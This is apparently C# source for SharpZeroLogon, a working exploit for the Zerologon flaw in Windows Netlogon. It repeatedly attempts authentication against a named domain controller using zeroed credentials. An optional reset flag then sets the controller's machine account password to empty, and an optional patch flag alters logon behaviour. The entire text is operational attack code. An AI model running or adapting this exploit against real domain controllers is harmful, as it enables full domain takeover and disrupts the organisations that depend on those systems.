public static extern int I_NetServerPasswordSet2(
string PrimaryName,
string AccountName,
NETLOGON_SECURE_CHANNEL_TYPE AccountType,
string ComputerName,
ref NETLOGON_AUTHENTICATOR Authenticator,
out NETLOGON_AUTHENTICATOR ReturnAuthenticator,
ref NL_TRUST_PASSWORD ClearNewPassword
);
private static Natives.NTSTATUS ChangeDCPassword(string targetcomputeraccount)
{
byte[] plaintext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
byte[] ciphertext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
NETLOGON_CREDENTIAL palintextcred = new NETLOGON_CREDENTIAL
{
data = plaintext
};
NETLOGON_CREDENTIAL chiphertextcred = new NETLOGON_CREDENTIAL
{
data = ciphertext
};
NETLOGON_AUTHENTICATOR plainAuth = new NETLOGON_AUTHENTICATOR
{
Credential = palintextcred,
Timestamp = 0
};
NETLOGON_AUTHENTICATOR cipherAuth = new NETLOGON_AUTHENTICATOR
{
Credential = chiphertextcred,
Timestamp = 0
};
IntPtr pcred = Marshal.AllocHGlobal(Marshal.SizeOf(plainAuth));
Marshal.StructureToPtr(plainAuth, pcred, false);
IntPtr ccred = Marshal.AllocHGlobal(Marshal.SizeOf(cipherAuth));
Marshal.StructureToPtr(cipherAuth, ccred, false);
IntPtr computernamePtr = Marshal.StringToHGlobalUni("Neverland");
IntPtr targetcomputeraccountPtr = Marshal.StringToHGlobalUni(targetcomputeraccount);
NL_TRUST_PASSWORD tpass = new NL_TRUST_PASSWORD();
IntPtr ptpass = Marshal.AllocHGlobal(Marshal.SizeOf(tpass));
Marshal.StructureToPtr(tpass, ptpass, false);
NTSTATUS rpcStatus = (NTSTATUS)NetServerPasswordSet2(GetStubPtr(), GetProcStringPtr(142), IntPtr.Zero, targetcomputeraccountPtr, NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, computernamePtr, pcred, ccred, ptpass);
return((NTSTATUS)rpcStatus);
}
static void Main(string[] args)
{
if (args.Length < 1)
{
Console.WriteLine(" Usage: SharpZeroLogon.exe <target dc fqdn> <optional: -reset -patch>");
return;
}
bool reset = false;
bool patch = false;
string fqdn = args[0];
string hostname = fqdn.Split('.')[0];
foreach (string arg in args)
{
switch (arg)
{
case "-reset":
reset = true;
break;
case "-patch":
patch = true;
break;
}
}
if (patch)
{
if (!PatchLogon())
{
Console.WriteLine("Patching failed :(");
return;
}
Console.WriteLine("Patch successful. Will use ncacn_ip_tcp");
}
NETLOGON_CREDENTIAL ClientChallenge = new NETLOGON_CREDENTIAL();
NETLOGON_CREDENTIAL ServerChallenge = new NETLOGON_CREDENTIAL();
ulong NegotiateFlags = 0x212fffff;
Console.WriteLine("Performing authentication attempts...");
for (int i = 0; i < 2000; i++)
{
if (I_NetServerReqChallenge(fqdn, hostname, ref ClientChallenge, ref ServerChallenge) != 0)
{
Console.WriteLine("Unable to complete server challenge. Possible invalid name or network issues?");
return;
}
Console.Write("=");
if (I_NetServerAuthenticate2(fqdn, hostname + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
hostname, ref ClientChallenge, ref ServerChallenge, ref NegotiateFlags) == 0)
{
Console.WriteLine("\nSuccess! DC can be fully compromised by a Zerologon attack.");
NETLOGON_AUTHENTICATOR authenticator = new NETLOGON_AUTHENTICATOR();
NL_TRUST_PASSWORD ClearNewPassword = new NL_TRUST_PASSWORD();
if (reset)
{
if (I_NetServerPasswordSet2(
fqdn,
hostname + "$",
NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
hostname,
ref authenticator,
out _,
ref ClearNewPassword
) == 0)
{
Console.WriteLine("Done! Machine account password set to NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0");
return;
}
Console.WriteLine("Failed to reset machine account password");
}
return;
}
}
Console.WriteLine("\nAttack failed. Target is probably patched.");
}
